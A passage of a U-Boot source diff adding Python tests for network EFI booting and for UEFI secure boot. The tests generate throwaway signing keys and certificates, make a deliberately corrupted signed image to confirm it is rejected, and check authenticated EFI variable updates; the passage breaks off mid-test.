value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__efi_loader_helloworld_file = { + 'fn': 'lib/efi_loader/helloworld.efi', # file name + 'size': 5058624, # file length in bytes + 'crc32': 'c2244b26', # CRC32 check sum + 'addr': 0x40400000, # load address +} +""" + +import pytest +import u_boot_utils + +net_set_up = False + +def test_efi_pre_commands(u_boot_console): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. 
+ """ + + init_usb = u_boot_console.config.env.get('env__net_uses_usb', False) + if init_usb: + u_boot_console.run_command('usb start') + + init_pci = u_boot_console.config.env.get('env__net_uses_pci', False) + if init_pci: + u_boot_console.run_command('pci enum') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_efi_setup_dhcp(u_boot_console): + """Set up the network using DHCP. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No DHCP server available') + return + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_efi_setup_static(u_boot_console): + """Set up the network using a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No static network configuration is defined') + return None + + for (var, val) in env_vars: + u_boot_console.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +def fetch_tftp_file(u_boot_console, env_conf): + """Grab an env described file via TFTP and return its address + + A file as described by an env config <env_conf> is downloaded from the TFTP + server. The address to that file is returned. + """ + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get(env_conf, None) + if not f: + pytest.skip('No %s binary specified in environment' % env_conf) + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return addr + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = u_boot_console.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + + return addr + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('cmd_bootefi_hello_compile') +def test_efi_helloworld_net(u_boot_console): + """Run the helloworld.efi binary via TFTP. + + The helloworld.efi file is downloaded from the TFTP server and is executed + using the fallback device tree at $fdtcontroladdr. + """ + + addr = fetch_tftp_file(u_boot_console, 'env__efi_loader_helloworld_file') + + output = u_boot_console.run_command('bootefi %x' % addr) + expected_text = 'Hello, world' + assert expected_text in output + expected_text = '## Application failed' + assert expected_text not in output + +@pytest.mark.buildconfigspec('cmd_bootefi_hello') +def test_efi_helloworld_builtin(u_boot_console): + """Run the builtin helloworld.efi binary. + + The helloworld.efi file is included in U-Boot, execute it using the + special "bootefi hello" command. 
+ """ + + output = u_boot_console.run_command('bootefi hello') + expected_text = 'Hello, world' + assert expected_text in output + +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.buildconfigspec('cmd_bootefi') +def test_efi_grub_net(u_boot_console): + """Run the grub.efi binary via TFTP. + + The grub.efi file is downloaded from the TFTP server and gets + executed. + """ + + addr = fetch_tftp_file(u_boot_console, 'env__efi_loader_grub_file') + + u_boot_console.run_command('bootefi %x' % addr, wait_for_prompt=False) + + # Verify that we have an SMBIOS table + check_smbios = u_boot_console.config.env.get('env__efi_loader_check_smbios', False) + if check_smbios: + u_boot_console.wait_for('grub>') + u_boot_console.run_command('lsefisystab', wait_for_prompt=False, wait_for_echo=False) + u_boot_console.wait_for('SMBIOS') + + # Then exit cleanly + u_boot_console.wait_for('grub>') + u_boot_console.run_command('exit', wait_for_prompt=False, wait_for_echo=False) + u_boot_console.wait_for(u_boot_console.prompt) + # And give us our U-Boot prompt back + u_boot_console.run_command('') diff --git a/test/py/tests/test_efi_secboot/conftest.py b/test/py/tests/test_efi_secboot/conftest.py new file mode 100644 index 00000000000..ff7ac7c8101 --- /dev/null +++ b/test/py/tests/test_efi_secboot/conftest.py @@ -0,0 +1,244 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI secure boot test.""" + +from subprocess import call, check_call, CalledProcessError +import pytest +from defs import * + +@pytest.fixture(scope='session') +def efi_boot_env(request, u_boot_config): + """Set up a file system to be used in UEFI secure boot test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. 
+ + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot.img' + + try: + mnt_point = u_boot_config.build_dir + '/mnt_efisecure' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # suffix + # *.key: RSA private key in PEM + # *.crt: X509 certificate (self-signed) in PEM + # *.esl: signature list + # *.hash: message digest of image as signature list + # *.auth: signed signature list in signature database format + # *.efi: UEFI image + # *.efi.signed: signed UEFI image + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -t "2020-04-01" -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # PK_null for deletion + check_call('cd %s; touch PK_null.esl; %ssign-efi-sig-list -t "2020-04-02" -c PK.crt -k PK.key PK PK_null.esl PK_null.auth' + % (mnt_point, EFITOOLS_PATH), shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -t "2020-04-03" -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db/ -keyout db.key -out db.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db.crt db.esl; %ssign-efi-sig-list -t "2020-04-04" -c KEK.crt -k KEK.key db db.esl db.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # db1 + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_db1/ -keyout db1.key -out db1.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s db1.crt db1.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key db db1.esl db1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx (TEST_dbx certificate) + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_dbx/ -keyout dbx.key -out dbx.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s dbx.crt dbx.esl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx.esl dbx.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash (digest of TEST_db certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db.crt dbx_hash.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash.crl dbx_hash.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 384 db.crt dbx_hash384.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash384.crl dbx_hash384.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 512 db.crt dbx_hash512.crl; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx dbx_hash512.crl dbx_hash512.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_hash1 
(digest of TEST_db1 certificate) + check_call('cd %s; %scert-to-efi-hash-list -g %s -s 256 db1.crt dbx_hash1.crl; %ssign-efi-sig-list -t "2020-04-06" -c KEK.crt -k KEK.key dbx dbx_hash1.crl dbx_hash1.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # dbx_db (with TEST_db certificate) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-05" -c KEK.crt -k KEK.key dbx db.esl dbx_db.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + # Copy image + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + + # Sign image + check_call('cd %s; sbsign --key db.key --cert db.crt helloworld.efi' + % mnt_point, shell=True) + # Sign already-signed image with another key + check_call('cd %s; sbsign --key db1.key --cert db1.crt --output helloworld.efi.signed_2sigs helloworld.efi.signed' + % mnt_point, shell=True) + # Create a corrupted signed image + check_call('cd %s; sh %s/test/py/tests/test_efi_secboot/forge_image.sh helloworld.efi.signed helloworld_forged.efi.signed' + % (mnt_point, u_boot_config.source_dir), shell=True) + # Digest image + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi db_hello.hash; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key db db_hello.hash db_hello.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %shash-to-efi-sig-list helloworld.efi.signed db_hello_signed.hash; %ssign-efi-sig-list -t "2020-04-03" -c KEK.crt -k KEK.key db db_hello_signed.hash db_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH, EFITOOLS_PATH), + shell=True) + check_call('cd %s; %ssign-efi-sig-list -t "2020-04-07" -c KEK.crt -k KEK.key dbx db_hello_signed.hash dbx_hello_signed.auth' + % (mnt_point, EFITOOLS_PATH), + shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format( + mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) + +# +# Fixture for UEFI secure boot test of intermediate certificates +# + + +@pytest.fixture(scope='session') +def efi_boot_env_intca(request, u_boot_config): + """Set up file system for secure boot test. + + Set up a file system to be used in UEFI secure boot test + of intermediate certificates. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. 
+ + Return: + A path to disk image to be used for testing + """ + image_path = u_boot_config.persistent_data_dir + image_path = image_path + '/test_efi_secboot_intca.img' + + try: + mnt_point = u_boot_config.persistent_data_dir + '/mnt_efi_secboot_intca' + check_call('rm -rf {}'.format(mnt_point), shell=True) + check_call('mkdir -p {}'.format(mnt_point), shell=True) + + # Create signature database + # PK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_PK/ -keyout PK.key -out PK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s PK.crt PK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key PK PK.esl PK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # KEK + check_call('cd %s; openssl req -x509 -sha256 -newkey rsa:2048 -subj /CN=TEST_KEK/ -keyout KEK.key -out KEK.crt -nodes -days 365' + % mnt_point, shell=True) + check_call('cd %s; %scert-to-efi-sig-list -g %s KEK.crt KEK.esl; %ssign-efi-sig-list -c PK.crt -k PK.key KEK KEK.esl KEK.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # We will have three-tier hierarchy of certificates: + # TestRoot: Root CA (self-signed) + # TestSub: Intermediate CA (signed by Root CA) + # TestCert: User certificate (signed by Intermediate CA, and used + # for signing an image) + # + # NOTE: + # I consulted the following EDK2 document for certificate options: + # BaseTools/Source/Python/Pkcs7Sign/Readme.md + # Please not use them as they are in product system. They are + # for test purpose only. + + # TestRoot + check_call('cp %s/test/py/tests/test_efi_secboot/openssl.cnf %s' + % (u_boot_config.source_dir, mnt_point), shell=True) + check_call('cd %s; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestRoot.key 2048; openssl req -extensions v3_ca -new -x509 -days 365 -key TestRoot.key -out TestRoot.crt -subj "/CN=TEST_root/"; touch index.txt; touch index.txt.attr' + % mnt_point, shell=True) + # TestSub + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestSub.key 2048; openssl req -new -key TestSub.key -out TestSub.csr -subj "/CN=TEST_sub/"; openssl ca -in TestSub.csr -out TestSub.crt -extensions v3_int_ca -days 365 -batch -rand_serial -cert TestRoot.crt -keyfile TestRoot.key' + % mnt_point, shell=True) + # TestCert + check_call('cd %s; touch serial.new; export OPENSSL_CONF=./openssl.cnf; openssl genrsa -out TestCert.key 2048; openssl req -new -key TestCert.key -out TestCert.csr -subj "/CN=TEST_cert/"; openssl ca -in TestCert.csr -out TestCert.crt -extensions usr_cert -days 365 -batch -rand_serial -cert TestSub.crt -keyfile TestSub.key' + % mnt_point, shell=True) + # db + # for TestCert + check_call('cd %s; %scert-to-efi-sig-list -g %s TestCert.crt TestCert.esl; %ssign-efi-sig-list -c KEK.crt -k KEK.key db TestCert.esl db_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-sig-list -g %s TestSub.crt TestSub.esl; %ssign-efi-sig-list -t "2020-07-16" -c KEK.crt -k KEK.key db TestSub.esl db_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-sig-list -g %s TestRoot.crt TestRoot.esl; %ssign-efi-sig-list -t "2020-07-17" -c KEK.crt -k KEK.key db TestRoot.esl db_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + ## dbx (hash of certificate with revocation time) + # for TestCert + check_call('cd %s; %scert-to-efi-hash-list -g 
%s -t "2020-07-20" -s 256 TestCert.crt TestCert.crl; %ssign-efi-sig-list -c KEK.crt -k KEK.key dbx TestCert.crl dbx_a.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestSub + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-21" -s 256 TestSub.crt TestSub.crl; %ssign-efi-sig-list -t "2020-07-18" -c KEK.crt -k KEK.key dbx TestSub.crl dbx_b.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + # for TestRoot + check_call('cd %s; %scert-to-efi-hash-list -g %s -t "2020-07-22" -s 256 TestRoot.crt TestRoot.crl; %ssign-efi-sig-list -t "2020-07-19" -c KEK.crt -k KEK.key dbx TestRoot.crl dbx_c.auth' + % (mnt_point, EFITOOLS_PATH, GUID, EFITOOLS_PATH), + shell=True) + + # Sign image + # additional intermediate certificates may be included + # in SignedData + + check_call('cp %s/lib/efi_loader/helloworld.efi %s' % + (u_boot_config.build_dir, mnt_point), shell=True) + # signed by TestCert + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --out helloworld.efi.signed_a helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub in signature + check_call('cd %s; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSub.crt --out helloworld.efi.signed_ab helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + # signed by TestCert with TestSub and TestRoot in signature + check_call('cd %s; cat TestSub.crt TestRoot.crt > TestSubRoot.crt; %ssbsign --key TestCert.key --cert TestCert.crt --addcert TestSubRoot.crt --out helloworld.efi.signed_abc helloworld.efi' + % (mnt_point, SBSIGN_PATH), shell=True) + + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat {} {}'.format(mnt_point, image_path), shell=True) + check_call('rm -rf {}'.format(mnt_point), shell=True) + + except CalledProcessError as e: + pytest.skip('Setup failed: %s' % e.cmd) + return + else: + yield image_path + finally: + call('rm -f %s' % image_path, shell=True) diff --git a/test/py/tests/test_efi_secboot/defs.py b/test/py/tests/test_efi_secboot/defs.py new file mode 100644 index 00000000000..6a2317e295b --- /dev/null +++ b/test/py/tests/test_efi_secboot/defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Constants used for secure boot test.""" + +# Owner guid +GUID = '11111111-2222-3333-4444-123456789abc' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/'. +EFITOOLS_PATH = '' + +# "--addcert" option of sbsign must be available, otherwise +# you need build a newer version on your own. +# The path must terminate with '/'. +SBSIGN_PATH = '' diff --git a/test/py/tests/test_efi_secboot/forge_image.sh b/test/py/tests/test_efi_secboot/forge_image.sh new file mode 100644 index 00000000000..2465d10fa7b --- /dev/null +++ b/test/py/tests/test_efi_secboot/forge_image.sh @@ -0,0 +1,5 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +#!/bin/sh + +replace_exp="s/H\0e\0l\0l\0o\0/h\0E\0L\0L\0O\0/g" +perl -p -e ${replace_exp} < $1 > $2 diff --git a/test/py/tests/test_efi_secboot/openssl.cnf b/test/py/tests/test_efi_secboot/openssl.cnf new file mode 100644 index 00000000000..f684f1df7e6 --- /dev/null +++ b/test/py/tests/test_efi_secboot/openssl.cnf @@ -0,0 +1,48 @@ +[ ca ] +default_ca = CA_default + +[ CA_default ] +new_certs_dir = . 
+database = ./index.txt +serial = ./serial +default_md = sha256 +policy = policy_min + +[ req ] +distinguished_name = def_distinguished_name + +[def_distinguished_name] + +# Extensions +# -addext " ... = ..." +# +[ v3_ca ] + # Extensions for a typical Root CA. + basicConstraints = critical,CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ v3_int_ca ] + # Extensions for a typical intermediate CA. + basicConstraints = critical, CA:TRUE + keyUsage = critical, digitalSignature, cRLSign, keyCertSign + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid:always,issuer + +[ usr_cert ] + # Extensions for user end certificates. + basicConstraints = CA:FALSE + keyUsage = critical, nonRepudiation, digitalSignature, keyEncipherment + extendedKeyUsage = clientAuth, emailProtection + subjectKeyIdentifier = hash + authorityKeyIdentifier = keyid,issuer + +[ policy_min ] + countryName = optional + stateOrProvinceName = optional + localityName = optional + organizationName = optional + organizationalUnitName = optional + commonName = supplied + emailAddress = optional diff --git a/test/py/tests/test_efi_secboot/test_authvar.py b/test/py/tests/test_efi_secboot/test_authvar.py new file mode 100644 index 00000000000..f99b8270a64 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_authvar.py @@ -0,0 +1,281 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Variable Authentication Test + +""" +This test verifies variable authentication +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiAuthVar(object): + def test_efi_var_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - Install signature database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, Initial secure state + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'printenv -e SecureBoot']) + assert '00000000: 00' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, PK without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 1c'): + # Test Case 1c, install PK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'printenv -e -n PK']) + assert 'PK:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + output = u_boot_console.run_command( + 'printenv -e SetupMode') + assert '00000000: 00' in output + + with u_boot_console.log.section('Test Case 1d'): + # Test Case 1d, db/dbx without KEK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 
4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 1e'): + # Test Case 1e, install KEK + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize KEK']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'printenv -e -n KEK']) + assert 'KEK:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1f'): + # Test Case 1f, install db + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + with u_boot_console.log.section('Test Case 1g'): + # Test Case 1g, install dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'dbx:' in ''.join(output) + + output = u_boot_console.run_command( + 'printenv -e SecureBoot') + assert '00000000: 01' in output + + def test_efi_var_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - Update database by overwriting + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, update without correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 2c'): + # Test Case 2c, update with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 
4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - Append database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, update without correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.esl', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' in ''.join(output) + + with u_boot_console.log.section('Test Case 3c'): + # Test Case 3c, update with correct signature + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth4(self, u_boot_console, efi_boot_env): + """ + Test Case 4 - Delete database without authentication + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 4a'): + # Test Case 4a, update without AUTHENTICATED_WRITE_ACCESS + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' not in ''.join(output) + assert 'db:' in ''.join(output) + + output = u_boot_console.run_command_list([ + 'setenv -e -nv -bs -rt db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + with u_boot_console.log.section('Test Case 4b'): + # Test Case 4b, update without correct signature/data + output = u_boot_console.run_command_list([ + 'setenv -e -nv -bs -rt -at db', + 'printenv -e -n -guid d719b2cb-3d3a-4596-a3bc-dad00e67656f db']) + assert 'Failed to set EFI variable' in ''.join(output) + assert 'db:' in ''.join(output) + + def test_efi_var_auth5(self, u_boot_console, efi_boot_env): + """ + Test Case 5 - Uninstall(delete) PK + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test 
